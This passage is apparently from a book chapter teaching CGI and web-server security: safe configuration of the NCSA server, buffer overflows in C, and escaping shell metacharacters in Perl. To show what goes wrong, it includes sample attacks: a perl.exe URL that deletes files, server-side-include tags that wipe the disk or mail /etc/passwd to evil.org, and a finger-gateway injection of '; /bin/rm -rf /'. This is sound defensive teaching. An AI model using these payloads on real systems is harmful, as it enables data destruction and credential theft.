CGI Security
chapter9
·
Basic Security Issues
·
Operating Systems
·
Securing Your Web Server
·
Writing Secure CGI Programs
·
Language Risks
·
Shell Dangers
·
Secure Transactions
·
SSL
·
SHTTP
·
Summary
Unless
you've programmed network software in the past, security has probably been
the least of your programming concerns. After all, you don't need to worry
about writing insecure programs on a single-user machine because,
presumably, only one person has access to the machine anyway.
However, programming software
designed for use over the Internet requires a different paradigm of
programming with a much greater emphasis on security. There's an old
computer maxim that says the only way to truly secure a computer is to
disconnect it from the rest of the world and keep it in a locked room.
Simply connecting the machine to a network weakens your machine's security.
This especially holds true for a
large-scale "network of networks" like the Internet, where literally
millions of people potentially have access to your computer. Many of the
services on the Internet, especially the World Wide Web, were designed so
that other people could easily access information from your computer. Each
of these services you make available (either consciously or inadvertently)
is another possible door for a wily, malicious user to exploit. A badly
written network server can be easily broken into, potentially giving someone
access to your entire machine and your important data.
What do I mean when I say that
every network service you provide is like another door on your system? What
exactly constitutes a security breach? For all intents and purposes, a
security breach is when a person gains unauthorized access to your
machine. "Unauthorized access" can mean many things ranging from running a
program on the server not meant to be publicly run to obtaining root access
on a UNIX machine.
You are largely dependent on the
knowledge and carefulness of the programmers who wrote the network servers
for security. After all, one cannot expect you to have to carefully sift
through thousands of lines of source code simply to make sure there are no
security holes in the software; for the most part, you depend on the
reliability of the programmer and other experts who have sifted through
source code and carefully tested the software. While past incidents such as
the Internet Worm have demonstrated that you cannot completely trust
programmers to write perfectly secure code, you can take steps to minimize
the risk.
Later, in "Securing Your Web
Server," you learn about Web server security. For the moment, assume your Web
server software is secure and properly configured; that is, no one can gain
unauthorized access to your machine through your Web server alone. Why is it
important to write secure CGI scripts? CGI is a generic protocol that
enables you to extend the Web server. By writing a CGI program, you are
adding functionality to the Web server, functionality that might
inadvertently introduce new security holes. A carelessly written CGI
application can allow anyone full access to your machine.
When users submit a form or access
a CGI script in another manner, you are essentially allowing them to run an
application remotely on your machine. Because many CGI applications accept
some form of user input (either through a fill-out form or from the command
line), to some extent you are allowing users to control how the CGI
application is run. As a CGI author, you need to make sure that your CGI
script can be used only for its specified purpose. This chapter goes over
related Web-security issues and provides in-depth information on writing
secure CGI programs. At the end of this chapter, you also learn how to write
CGI for secure transactions.
Basic Security Issues
Overall security of your Web
serving machine depends on many factors. A secure CGI program is useless if
your server is misconfigured or if there are other holes on your system. I
discuss some of the related Web security issues here and explain how to
properly configure your Web server for CGI.
Operating Systems
A common question is which
platform is more secure for a Web server: a Macintosh running System 7, a
UNIX workstation, a PC running OS/2, and so on. There have been many wars on
this topic, each of which reflects people's different biases toward
different operating systems.
No operating system is clearly
more secure than another. UNIX is arguably more secure than a single-user
platform such as a Macintosh or a PC running Windows, because once a user
breaks into one of these latter machines, he or she has access to all your
files. UNIX, however, has a fundamental understanding of file ownerships and
permissions. If your server is configured correctly and is owned by a safe
(for example, non-root) user, then if someone unauthorized breaks in, he or
she can do only limited damage. Limited damage, however, can be bad enough,
as you will see in the examples later in this chapter.
On the other hand, because UNIX
often comes preconfigured with many different types of network services such
as mail, FTP, Gopher, WWW, and so on, there are more potential "doors" for
someone to enter. Securing all of these services is a difficult and
time-consuming process, even for the experienced administrator. Even if you
configure everything correctly, you are still at the mercy of possible bugs
in each individual package. Security flaws in various packages are not
uncommon, as is clear from the frequency of notices of insecurities in
various common UNIX network services from organizations such as the Computer
Emergency Response Team (CERT).
Every platform has its
own security implications, but no one platform is inherently more secure than
another. Although you should be aware of the implications of each operating
system, security should not be your primary criterion when choosing a platform.
Choose your platform, seal off the holes associated with that platform, and
then configure your Web server securely and correctly. Only after you have
completed these steps should you concern yourself with writing secure CGI
scripts.
Securing Your Web Server
The first step in writing secure
CGI scripts is to make sure your Web server is securely and properly
configured. If your Web server is not secure, it does not matter how
carefully you write your CGI scripts; people can still break into your
machine. Additionally, configuring your Web server correctly helps minimize
the potential damage of a badly written CGI program.
Choosing a Secure Web Server
There are countless
Web servers available for a variety of platforms, and deciding
which products are secure is a difficult if not impossible task.
As with any product, you will need to rely on company reputation and
word-of-mouth.
Examine your options. After
you have a list of Web servers, look at how long each product has been
available and how many people currently use it. The older and more
frequently used the Web server, the more likely security bugs have
been found and fixed. If the code is freely available and if you have
some time and expertise, look through the source code yourself and see
if you can find a potential hole. Read what people on the various Web
Usenet newsgroups have to say about each product and its authors or
publishers. Reputable companies or authors will inform their users
immediately about any problems with their product. Read the various
security alerts from organizations such as CERT and CIAC (Computer
Incident Advisory Capability).
Examine the feature-set and
determine whether you really need all of the features. The more
complex and powerful the server, the more likely there is an
undetected security hole. Make sure your server supports logging so
you can trace the cause of security break-ins or other trouble.
Have a contingency plan. Be
prepared to quickly upgrade or replace your Web server if a security
hole is discovered. Pay attention to news releases and the newsgroups
for information regarding your Web server. Try to use the latest
non-beta version of the Web server.
Don't be afraid of the free
servers. There is debate over whether providing source code makes a
server more or less secure. If the server source is not available,
security holes are more difficult to discover. If the source is
available, however, then theoretically holes can be discovered,
announced, and patched quickly.
You should have three goals when
securing your Web server:
·
Configure your programs to do only what you want
them to do, nothing more.
·
Don't reveal any more information than necessary.
·
Minimize the potential damage if someone breaks
in.
The more I know about your
computer, the better equipped I am to break into it. For example, if I know
in which directory or folder all of your sensitive, private information is
stored, I have narrowed my objective from gaining total access to your
machine to simply gaining access to a directory, usually a simpler task. Or
if I have access to your server configuration files or the source code to your
CGI scripts, I can easily browse through them looking for potential
security holes. If there are holes in your system, you don't want to make it
easy for others to know about them, and you want to find them before others
do.
Where Should You Put Your CGI?
As discussed earlier in
Chapter 2, "The Basics," most Web servers enable you to run CGI programs
in many different ways. For example, you could designate a specific
directory as your cgi-bin. Alternatively, you could allow CGI to be stored
in any directory.
There are advantages and
disadvantages to both, but from a security standpoint, it is better to
designate one directory to store all of your CGI applications. Having all of
your programs in one directory makes it easier to keep track of all of the
applications on your server and to audit them for potential security holes.
It also helps prevent tampering. If your scripts are located in several
different directories, you need to constantly check each one of these for
tampering.
If you tend to use a scripting
language (such as Perl) for most of your applications, then the source code
is contained within the application itself. This code, then, is potentially
vulnerable to being read, and exploited, if you're not careful. For example,
many text editors save backup files, usually appending some extension to the
end of the filename (such as .bak).
For example, emacs saves a backup
copy of filename as filename~. Suppose that you have a CGI script
written in Perl, program.cgi, stored in one of the Web data directories rather
than in a central designated directory. Now suppose that you made a trivial
change to the program using emacs and forgot to remove the backup file. You
now have two files in your directory: program.cgi and program.cgi~. The Web
server knows that files ending in .cgi are CGI programs and will run the
program rather than display its content. However, a smart user might try to
access program.cgi~ instead. Because it does not end in .cgi, your Web
server sends it as a raw text file, thus allowing the user to search your
source code for possible holes. This violates the second goal of securing
your server: don't reveal any more information than necessary.
However, if your server enables
you to specify all files located in a certain directory as a CGI, it doesn't
matter what the extension of the file is. So in the same example earlier, if
the backup file were located in a properly designated directory and a user
tried to access it, the server would try to run the program rather than send
the source code.
Note that designating a central
directory as the location of all CGI programs on your server is limiting,
especially on a multiuser system. For example, if you are an Internet
Service Provider and you want to allow your users to write and run their own
CGI, you might be inclined to allow CGI to be stored in any directory.
Before you do this, consider the alternative options carefully. Are your
clients going to be writing a lot of special customized scripts? If not, it
is better to have your clients submit the scripts for auditing before being
added to the cgi-bin directory rather than enabling CGI in all directories.
Another issue regarding the
location of CGI programs is where to put the interpreter. For interpreted
scripts, the server runs the interpreter, which in turn loads the script and
executes it.
Never put the interpreter in your
cgi-bin directory, or in any directory in your data tree for that matter.
Giving users access to the interpreter essentially gives them the power to
run any application or any series of commands on your system.
This is especially important if
you use a Windows or other non-UNIX operating system. In UNIX, you can
specify the interpreter in the first line of your script. For example:
#!/usr/local/bin/perl
# this first line says use Perl to run the following script
In Windows, for example, there is
no analogous method of specifying the interpreter within the script. One way
to call a Perl script would be to create a batch file that calls Perl and
the script.
rem progname.bat
rem a wrapper for my perl script, progname.pl
c:\perl\perl.exe progname.pl
However, you might be inclined to
avoid creating this extra program by simply putting perl.exe in your cgi-bin
directory and accessing the following URL:
http://hostname/cgi-bin/perl.exe?progname.pl
This works, but it also enables
anyone in the world to run any Perl command on your machine. For example,
someone could access the following URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
Decoded, the previous line is
equivalent to calling Perl and running the following one-line program, which
will delete all the files in the current directory. Clearly, this is
undesirable.
unlink <*.*>;
You will never have a reason to
put an interpreter in your cgi-bin directory (or any directory capable of
running CGI), so never do it. Some Windows servers can determine the type of
script by its extension and run the appropriate interpreter. For example,
Win-HTTPD assumes every CGI script ending in .pl is a Perl script and will
run Perl automatically. If your Web server does not have this feature, use a
wrapper script like the first Windows Perl example earlier in this chapter.
Should I Use an Interpreter?
You should never even be
tempted to put an interpreter in your cgi-bin if you are using a UNIX
or Macintosh Web server. As noted earlier, UNIX enables you to specify
the location of the interpreter within the script. To enable scripts
on a Macintosh, you associate the script with the appropriate
interpreter by editing the resource using a utility such as ResEdit.
Server-Side Includes
In
Chapter 4, "Output," you learned a few reasons why you should avoid
server-side includes. A common reason often raised is security.
Specifically, some implementations of server-side includes (notably NCSA and
Netscape) enable users to embed the output of programs in an HTML document.
Every time one of these HTML files is accessed, the program is run on the
server-side and the output is displayed as part of the HTML document.
By allowing this sort of
server-side include, you become susceptible to a few potential security
risks. First, on a UNIX machine, the programs are run by the owner of the
server, not the owner of the program. If your server isn't properly
configured and you have sensitive files or programs owned by the server
owner, these files and programs and their output become accessible by users
on your machine.
This risk increases if you allow
users to edit HTML files on your system from Web browsers. A common example
of this is a guestbook. In a guestbook, users fill out a form and
submit messages to a CGI program, which will often simply append the
unedited message to an HTML file, the guestbook. By not editing or filtering
the submitted message, you allow the user to submit HTML code from his or
her browser. If you allow programs to be executed in a server-side include,
a malicious user can wreak havoc to your machine by submitting a tag like
the following:
<!--#exec cmd="/bin/rm -rf /"-->
This server-side include will
attempt to delete everything it can on your machine.
Note that you could have prevented
this problem in several ways without having to completely turn off
server-side includes. You could have filtered out all HTML tags before
appending the submitted text to your guestbook. Or you could have disabled
the exec capability of your server-side include (I show you how to do this
for the NCSA server later in this chapter in "Example: Securely Configuring
the NCSA Server").
If you forgot to do either of
these things, other precautions you should have taken would have greatly
minimized the damage on your machine by such a tag anyway. For example, as
long as your server was running as a nonexistent, non-root user, this tag
would most likely not have deleted anything of any importance, perhaps
nothing at all. Suppose that instead of attempting to delete everything on
your disks, the malicious user attempted to obtain your /etc/passwd for
hopeful cracking purposes using something like the following:
<!--#exec cmd="/bin/mail me@evil.org < /etc/passwd"-->
However, if your system was using
the shadow password suite, then your /etc/passwd contains no encrypted
passwords for potential hackers to crack.
This example demonstrates two
important things about both server-side includes and CGI in general. First,
security holes can be completely hidden. Who would have thought that a
simple guestbook program on a system with server-side includes posed a large
security risk? Second, the potential damage of an inadvertent security hole
can be greatly minimized by carefully configuring your server and securing
your machine as a whole.
Although server-side includes add
another potentially useful dimension to your Web server, think carefully
about the potential risks, as well. In
Chapter 4, I offer several alternatives to using server-side includes.
Unless you absolutely need to use server-side includes, you might as well
disable them and close off a potential security hole.
Securing Your UNIX Web Server
A secured UNIX system is a
powerful platform for serving Web documents. However, there are many complex
issues associated with securing and properly configuring a UNIX Web server.
The very first thing you should do is make sure your machine is as secure as
possible.
Disable network services you don't
need, no matter how harmless you think they are. It is highly unlikely that
anyone can break into your machine using the finger protocol, for example,
which only answers queries about users. However, finger can give hackers
useful information about your system.
Secure your system internally. If
a hacker manages to break into one user's account, make sure the hacker
cannot gain any additional privileges. Useful actions include installing a
shadow password suite and removing all setuid scripts (scripts that are set
to run as the owner of the script, even if called by another user).
Securing a UNIX machine is a
complex topic and goes beyond the scope of this book. I highly recommend
that you purchase a book on the topic, read the resources available on the
Internet, even hire a consultant if necessary. Don't underestimate the
importance of securing your machine.
Next, allot separate space for
your Web server and document files. The intent of your document directories
is to serve these files to other people, possibly to the rest of the world,
so don't put anything in these directories that you wouldn't want anyone
else to see. Your server directories contain important log and configuration
information. You definitely do not want outside users to see this
information, and you most likely don't want most of your internal users to
see it or write to it either.
Set the ownership and permissions
of your directories and server wisely. It's common practice to create a new
user and group specifically to own Web-related directories. Make sure
nonprivileged users cannot write to the server or document directories.
Your server should never be
"running as root." This statement is somewhat misleading. In UNIX, only root can
bind to ports below 1024. Because by default Web servers run on port 80,
you need to be root to start a Web server. However, after the Web server is
started as root, it can either change its own process's ownership (if it's
internally threaded) or change the ownership of its child processes that
handle connections (if it's a forking server). Either method allows the
server to process requests as a non-root user. Make sure you configure your
Web server to "run as non-root," preferably as a completely nonexistent user
such as "nobody." This limits the potential damage if you have a security
hole in either your server or your CGI program.
Disable all features unless you
absolutely need them. If you initially disable a feature and then later
decide you want to use it, you can always turn it back on. Features you
might want to disable include server-side includes and serving symbolic
links.
If your users don't need to serve
their personal Web documents from your server, disable public Web
directories. This enables you to have complete and central control over all
documents served from your machine, an important quality for general
maintenance and security.
If your users do need to serve
their personal documents (for example, if you are an Internet Access
Provider), make sure they cannot override your main configuration. Seriously
consider whether users need the ability to run CGI programs from their own
personal directories. As stated earlier, it's preferable to store all CGI in
one centralized location.
CGIWRAP
A popular package available
on the Web is cgiwrap, written by Nathan Neulinger (nneul@umr.edu). This
package enables users to run their own CGI programs by running the
program as the owner of the program rather than the owner of the
server.
It's not clear whether this
is more or less beneficial than simply allowing anyone to run his or
her own CGI programs unwrapped. On one hand, a bad CGI script can
do less damage running as nobody than running as a user who
actually exists. On the other hand, if the CGI program does damage the
system as nobody, the responsibility lies on the system administrator,
whereas if only a specific user's files were damaged, it would
ultimately be the user's responsibility.
My advice would be to not go
with either option and simply disallow unaudited user CGI programs. If
this is unacceptable, then ultimately whether you use cgiwrap or a
similar program depends on where you want the responsibility to lie.
Finally, you might want to
consider setting up a chroot environment for your Web documents. In UNIX,
you can protect a directory tree by using chroot. A server running inside of
a chrooted directory cannot see anything outside of that directory tree.
Under a chrooted environment, if someone manages to break in through your
Web server, they can damage files only within that directory tree.
Note, however, that a chrooted
environment is appropriate only for a Web server serving a single source of
documents. If your Web server is serving users' documents in multiple
directories, it is nearly impossible to set up an effective chrooted
environment. Additionally, a chrooted environment is weakened by the
existence of interpreters (such as Perl or a shell). In a chrooted
environment without any shells or interpreters, someone who has broken in
can at worst change or damage your files; with an interpreter, potential
damage increases.
Example: Securely Configuring the NCSA Server
I'll demonstrate how one might go
about properly configuring a common Web server in a UNIX environment by
discussing the NCSA Server (v1.4.2). There are many Web servers available
for UNIX, but NCSA is one of the oldest, is commonly used, is freely
available, and is fairly easy to configure. I will demonstrate only the
configuration I think is most relevant to securing the Web server; for more
detailed instructions on configuring NCSA httpd, look at its Web site:
URL:http://hoohoo.ncsa.uiuc.edu/.
You can apply the principles demonstrated here to almost any UNIX Web
server.
First, I need to present the
criteria. In this scenario, I want to set up the NCSA server on a secured
UNIX machine for a small Internet service provider called MyCompany. The
machine's host name is www.mycompany.net. I want everyone with an account on
my machine to be able to serve his or her own Web documents and possibly use
CGI or other features.
What features do I absolutely
need? In this case, because I'm a small Internet service provider, I will
not let users serve their own CGI. If they want to write and use their own
CGI programs, they must submit them to me for auditing; if they're okay, I'll
install them. Additionally, I'll provide general programs that are commonly
requested, such as guestbooks and generic form-processing applications. I
don't need any other features for now in this scenario, including
server-side includes.
Here is how I'm going to configure
my Web server. I will create the user and group www; these will own all of
the appropriate directories. I will create one directory for my server files
(/usr/local/etc/httpd/) and one directory for the Web documents (/usr/local/etc/httpd/htdocs/).
Both directory trees will be world readable and user and group writeable.
Now, I'm ready to configure the
server. NCSA httpd has three configuration files: access.conf, httpd.conf,
and srm.conf. First, you need to tell httpd where your server and HTML
directories are located. In httpd.conf, specify the server directory with
the following line:
ServerRoot /usr/local/etc/httpd
In srm.conf, specify the document
directory with
DocumentRoot /usr/local/etc/httpd/htdocs
Because I want to designate all
files in /usr/local/etc/httpd/cgi-bin as CGI programs, I include the
following line in srm.conf:
ScriptAlias /cgi-bin/ /usr/local/etc/httpd/cgi-bin/
Note that the actual location of
my cgi-bin directory is not in my document tree but in my server tree.
Because I want to keep my server directory (including the directory
containing the CGI) as private as possible, I keep it outside of the
document directory. If I have a CGI in this directory called mail.cgi, I can
access it by using the URL
http://www.mycompany.net/cgi-bin/mail.cgi
One other line in srm.conf needs
to be edited; it's not particularly relevant to our specific quest of
securing the server, but for completeness' sake, I'll mention it anyway:
Alias /icons/ /usr/local/etc/httpd/icons/
The Alias directive enables you to
specify an alias for a directory either in or out of your document directory
tree. Unlike the ScriptAlias directive, Alias does not change the meaning of
the directory in any other way.
Because I want to disable
server-side includes and not allow CGI in any directory other than cgi-bin,
I comment out the following lines in srm.conf by inserting a pound sign (#) in front
of each one.
#AddType text/x-server-parsed-html .shtml
#AddType application/x-httpd-cgi .cgi
AddType enables you to associate
MIME types with filename extensions. text/x-server-parsed-html is the MIME
type for parsed HTML (for example, HTML with embedded tags for server-side
includes) whereas application/x-httpd-cgi is the type for CGI applications.
I don't need to specify the extension for this MIME type in this case
because I've configured the server to assume that everything in the cgi-bin,
regardless of filename extension, is a CGI.
Finally, I need to set properties
and access restrictions to certain directories by editing the global
access.conf file. To define global parameters for all the directories,
simply put the directives in the file without any surrounding tags. In order
to specify parameters for specific directories, surround the directives with
<Directory directoryname>
tags, where directoryname is
the full path of the directory.
By default, the following global
options are set:
Options Indexes FollowSymLinks
Indexes allows the server to return an
automatically generated listing when a URL names a directory that contains no index file.
The name of the index file, specified by DirectoryIndex in srm.conf, is set by default
to index.html, which is fine for my purposes. FollowSymLinks means that the
server will return the data to which the symbolic link is pointing. I see no
need for this feature, so I'll disable it. Now, this line looks like the
following:
Options Indexes
If I want to allow CGI programs in
any directory, I could set that by including the option ExecCGI.
Options Indexes ExecCGI
This line, along with the AddType
directive in srm.conf, would allow me to run a CGI in any directory by
adding the extension .cgi to all CGI programs.
By default, NCSA httpd is
configured so that all of the settings in access.conf can be overridden by
creating an .htaccess file in the specific directory with the appropriate
properties and access restrictions. In this case, I don't mind if users
change their own access restrictions. However, I don't want users to give
themselves the ability to run CGI in their directories by putting the following
lines in an .htaccess file:
AddType application/x-httpd-cgi .cgi
Options Indexes ExecCGI
Therefore, I edit access.conf to
allow the user to override all settings except for Options.
AllowOverride FileInfo AuthConfig Limit
My server is now securely
configured. I have disallowed CGI in all but the cgi-bin directory, and I've
completely disallowed server-side includes. The server runs as user nobody,
a nonexistent user on my system. I've disabled all features I don't need, and
users cannot override these important restrictions. For more information on
the many other configurations, including detailed access restrictions, refer
to the NCSA server documentation.
Writing Secure CGI Programs
At this point, you have presumably
secured your machine and your Web server. You are finally ready to learn how
to write a secure CGI program. The basic principles for writing secure CGI
are similar to the ones outlined earlier:
·
Your program should do what you want and nothing
more.
·
Don't give the client more information than it
needs to know.
·
Don't trust the client to give you the proper
information.
I've already demonstrated the
potential danger of ignoring the first principle with the guestbook example. I
present a few other common mistakes that can open up holes, but you need to
remember to consider all of the implications of every function you write or
use.
The second principle is simply an
extension of a general security principle: the less the outside world knows
about the inside of your system, the less-equipped outsiders are to break
in.
This last principle is not just a
good programming rule of thumb but a good security one, as well. CGI
programs should be robust. One of the first things a hacker will try to do
to break into a machine through a CGI program is to try to confuse it by
experimenting with the input. If your program is not robust, it will either
crash or do something it was not designed to do. Both possibilities are
undesirable. To combat this possibility, don't make any assumptions about
the format of the information or the values the client will send.
The most bare-bones CGI program is a
simple input/output program. It takes what the client tells it and returns
some response. Such a program offers very little risk (although possible
holes still exist, as you will later see). Because the CGI program is not
doing anything interesting with the input, nothing wrong is likely to
happen. However, once your program starts manipulating the input, possibly
calling other programs, writing files, or doing anything more powerful than
simply returning some output, you risk introducing a security hole. As
usual, power is directly proportional to security risk.
Language Risks
Different languages have different
inherent security risks. Secure CGI programs can be written in any language,
but you need to be aware of each language's quirks. I discuss only C and
Perl here, but some of the traits can be generalized to other languages. For
more specific information on other languages, refer to the appropriate
documentation.
Earlier in this chapter you
learned that in general, compiled CGI programs are preferable to interpreted
scripts. Compiled programs have two advantages: first, you don't need to
have an interpreter accessible to the server, and second, source code is not
available. Note that some traditionally interpreted languages such as Perl
can be compiled into a binary. (For information on how to do this in Perl,
consult Larry Wall and Randal Schwartz's Programming Perl, published
by O'Reilly & Associates.) From a security standpoint, a compiled Perl
program is just as good as a compiled C program.
Lower-level languages such as C
suffer from a problem called a buffer overflow. C doesn't have a good
built-in method of dealing with strings. The traditional method is to
declare either an array of characters or a pointer to a character. Many
programmers tend to use the former method because it is easier to program.
Consider the two equivalent excerpts of code in Listings 9.1 and 9.2.
-----------------------------------------------
Listing 9.1. Defining a string using an array in C.
#include <stdio.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
    char buffer[80];
    strcpy(buffer,message);
    printf("%s\n",buffer);
    return 0;
}
----------------------------------------
Listing 9.2. Defining a string using a pointer in C.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
    /* one extra byte for the terminating null character */
    char *buffer = malloc(sizeof(char) * (strlen(message) + 1));
    if (buffer == NULL)
        return 1;
    strcpy(buffer,message);
    printf("%s\n",buffer);
    free(buffer);
    return 0;
}
----------------------------------------------
Listing 9.1 is much simpler than
Listing 9.2, and in this specific example, both work fine. This is a
contrived example; I already know the length of the string I am dealing
with, and consequently, I can define the appropriate length array. However,
in a CGI program, you have no idea how long the input string is. If message,
for example, were 80 characters or longer, the code in Listing 9.1 would
write past the end of the array and most likely crash.
This is called a buffer
overflow, and smart hackers can exploit these to remotely execute
commands. The buffer overflow was the bug that afflicted NCSA httpd v1.3.
It's a good example of how and why a network (or CGI) programmer needs to
program with more care. On a single-user machine, a buffer overflow simply
leads to a crash. There is no advantage to executing programs using a buffer
overflow on a crashed single-user machine because presumably (with the
exception of public terminals), you could have run any program you wanted
anyway. However, on a networked system, a crashed CGI program is more than a
nuisance; it's a potential door for unauthorized users to enter.
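If you do want to keep a fixed-size array, one hedged way to avoid the overflow is to check the length before copying. The sketch below uses a hypothetical helper named copy_bounded(); the name and the choice to reject oversized input (rather than truncate it) are assumptions, not something prescribed by this chapter.

```c
#include <string.h>

/* Hypothetical helper: copy src into dst, which can hold dst_size bytes,
   without ever writing past the end of dst. Returns 0 on success, or -1
   if the arguments are invalid or src (plus its null) does not fit. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    len = strlen(src);
    if (len >= dst_size) {
        dst[0] = '\0';              /* leave dst as a valid empty string */
        return -1;
    }
    memcpy(dst, src, len + 1);      /* len + 1 copies the null as well */
    return 0;
}
```

With char buffer[80], a call such as copy_bounded(buffer, sizeof buffer, input) fails cleanly on long input instead of overwriting memory, and the program can then report an error to the client.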
The code in Listing 9.2 solves two
problems. First, it dynamically allocates enough memory to store the string.
Second, notice that I added 1 to the length of the message. I actually
allocate enough memory for one more character than the length of the string.
This guarantees room for the terminating null character: strlen() does not
count the null, but strcpy() copies it along with the rest of the string.
(It is strncpy(), not strcpy(), that pads the remainder of the target string
with null characters.) Note that strcpy() relies on the source string being
null-terminated. There's no reason to assume that the raw input sent to the
CGI script ends in a null character, so when you copy raw input, copy it by
length and place a null character at the end yourself.
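The allocation pattern can be sketched for raw input whose length is known but which may not end in a null character. The helper name dup_input() is hypothetical, and the sketch assumes the caller already knows how many bytes of input it holds.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: copy exactly len bytes of raw input into a freshly
   allocated buffer and add the terminating null ourselves. Returns NULL
   on failure; the caller is responsible for calling free(). */
char *dup_input(const char *data, size_t len)
{
    char *copy;

    if (data == NULL || len == (size_t)-1)  /* len + 1 would wrap to 0 */
        return NULL;
    copy = malloc(len + 1);                 /* one extra byte for the null */
    if (copy == NULL)
        return NULL;
    memcpy(copy, data, len);
    copy[len] = '\0';
    return copy;
}
```

Because the copy is driven by the length rather than by a search for a null character, it behaves the same whether or not the input happens to be null-terminated.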
Provided your C programs avoid
problems such as buffer overflows, you can write secure CGI programs.
However, this is a tough provision, especially for large, more complicated
CGI programs. Problems like this force you to spend more time thinking about
low-level programming tasks rather than the general CGI task. For this
reason, you might prefer to program in a higher-level programming language
(such as Perl) that robustly handles such low-level tasks.
However, there is a flip side to
the high-level nature of Perl. Although you can assume that Perl will
properly handle string allocation for you, there is always the danger that
Perl is doing something in a high-level syntax of which you are not aware.
This will become clearer in the next section on shell dangers.
Shell Dangers
Many CGI tasks are most easily
implemented by running other programs. For example, if you were to write a
CGI mail gateway, it would be silly to completely reimplement a mail
transport agent within the CGI program. It's much more practical to pipe the
data into an existing mail transport agent such as sendmail and let sendmail
take care of the rest of the work. This practice is fine and is encouraged.
The security risk depends on how
you call these external programs. There are several functions that do this
in both C and Perl. Many of these functions work by spawning a shell and by
having the shell execute the command. These functions are listed in Table
9.1. If you use one of these functions, you are vulnerable to weaknesses in
UNIX shells.
Table 9.1. Functions in both C and Perl that spawn a shell.
Perl Functions        C Functions
system(' . . . ')     system()
open('| . . . ')      popen()
exec(' . . . ')
eval(' . . . ')
` . . . `
Why are shells dangerous? There
are several nonalphanumeric characters that are reserved as special
characters by the shell. These characters are called metacharacters
and are listed in Table 9.2.
Table 9.2. Shell metacharacters.
;   <   >   *   |
`   &   $   !   #
(   )   [   ]   :
{   }   '   "
Each of these metacharacters
performs special functions within the shell. For example, suppose that you
wanted to finger a machine and save the results to a file. From the command
line, you might type:
finger @fake.machine.org > results
This would finger the host
fake.machine.org and save the results to the text file results. The >
character in this case is a redirection character. If you wanted to actually
use the > character-for example, if you want to echo it to the screen-you
would need to precede the character with a backslash. For example, the
following would print a greater-than symbol > to the screen:
echo \>
This is called escaping or
sanitizing the character string.
How can a hacker use this
information to his or her advantage? Observe the finger gateway written in
Perl in Listing 9.3. All this program is doing is allowing the user to
specify a user and a host, and the CGI will finger the user at the host and
display the results.
----------------------------------------
Listing 9.3. finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an unsafe finger gateway
require 'cgi-lib.pl';
print &PrintHeader;
if (&ReadParse(*in)) {
    print "<pre>\n";
    # back ticks: the command is run by a shell
    print `/usr/bin/finger $in{'username'}`;
    print "</pre>\n";
}
else {
    print "<html> <head>\n";
    print "<title>Finger Gateway</title>\n";
    print "</head>\n<body>\n";
    print "<h1>Finger Gateway</h1>\n";
    print "<form method=POST>\n";
    print "<p>User\@Host: <input type=text name=\"username\">\n";
    print "<p><input type=submit>\n";
    print "</form>\n";
    print "</body> </html>\n";
}
-----------------------------------------------
At first glance, this might seem
like a harmless finger gateway. There's no danger of a buffer overflow
because it is written in Perl. I use the complete pathname of the finger
binary so the gateway can't be tricked into using a fake finger program. If
the input is in an improper format, the gateway will return an error but not
one that can be manipulated.
However, what if I try entering
the following in the field:
nobody@nowhere.org ; /bin/rm -rf /
Work out how the following line
will deal with this input:
print `/usr/bin/finger $in{'username'}`;
Because you are using back ticks,
first it will spawn a shell. Then it will execute the following command:
/usr/bin/finger nobody@nowhere.org ; /bin/rm -rf /
What will this do? Imagine typing
this in at the command line. It will wipe out all of the files and
directories it can, starting from the root directory. We need to sanitize
this input to render the semicolon (;) metacharacter harmless. In Perl, this
is easily achieved with the function listed in Listing 9.4. (The equivalent
function for C is in Listing 9.5; this function is from the cgihtml C
library.)
-------------------------------------
Listing 9.4. escape_input() in Perl.
sub escape_input {
    my ($str) = @_;
    # put a backslash in front of every shell metacharacter
    $str =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
    return $str;
}
---------------------------------------------
Listing 9.5. escape_input() in C.
#include <stdlib.h>
#include <string.h>

char *escape_input(char *str)
/* takes string and escapes all metacharacters. should be used before
   including string in system() or similar call. returns a newly
   allocated string (caller frees), or NULL if allocation fails. */
{
    size_t i, j = 0;
    size_t len = strlen(str);
    /* worst case: every character needs a backslash, plus the null */
    char *new = malloc(sizeof(char) * (len * 2 + 1));

    if (new == NULL)
        return NULL;
    for (i = 0; i < len; i++) {
        switch (str[i]) {
        case '|': case '&': case ';': case '(': case ')': case '<':
        case '>': case '\'': case '"': case '*': case '?': case '\\':
        case '[': case ']': case '$': case '!': case '#': case ':':
        case '`': case '{': case '}':
            new[j] = '\\';
            j++;
            break;
        default:
            break;
        }
        new[j] = str[i];
        j++;
    }
    new[j] = '\0';  /* terminate the string */
    return new;
}
--------------------------------------------------
This returns a string with the
shell metacharacters preceded by a backslash. The revised finger.cgi gateway
is in Listing 9.6.
-----------------------------------
Listing 9.6. A safe finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - a safe finger gateway
require 'cgi-lib.pl';
sub escape_input {
    my ($str) = @_;
    # put a backslash in front of every shell metacharacter
    $str =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
    return $str;
}
print &PrintHeader;
if (&ReadParse(*in)) {
    # back ticks do not interpolate function calls, so escape first
    $user = &escape_input($in{'username'});
    print "<pre>\n";
    print `/usr/bin/finger $user`;
    print "</pre>\n";
}
else {
    print "<html> <head>\n";
    print "<title>Finger Gateway</title>\n";
    print "</head>\n<body>\n";
    print "<h1>Finger Gateway</h1>\n";
    print "<form method=POST>\n";
    print "<p>User\@Host: <input type=text name=\"username\">\n";
    print "<p><input type=submit>\n";
    print "</form>\n";
    print "</body> </html>\n";
}
-----------------------------------------------------------------
This time, if you try the same
input as before, a shell is spawned and it tries to execute:
/usr/bin/finger nobody@nowhere.org \; /bin/rm -rf /
The malicious attempt has been
rendered useless. Rather than attempt to delete all the directories on the
file system, it will try to finger the users nobody@nowhere.org, ;, /bin/rm,
-rf, and /. It will probably return an error because it is unlikely that the
latter four users exist on your system.
Note a couple of things. First, if
your Web server was configured correctly (for example, running as non-root),
the attempt to delete everything on the file system would have failed. (If
the server was running as root, then the potential damage is limitless.
Never do this!) Additionally, the user would have to assume that the rm
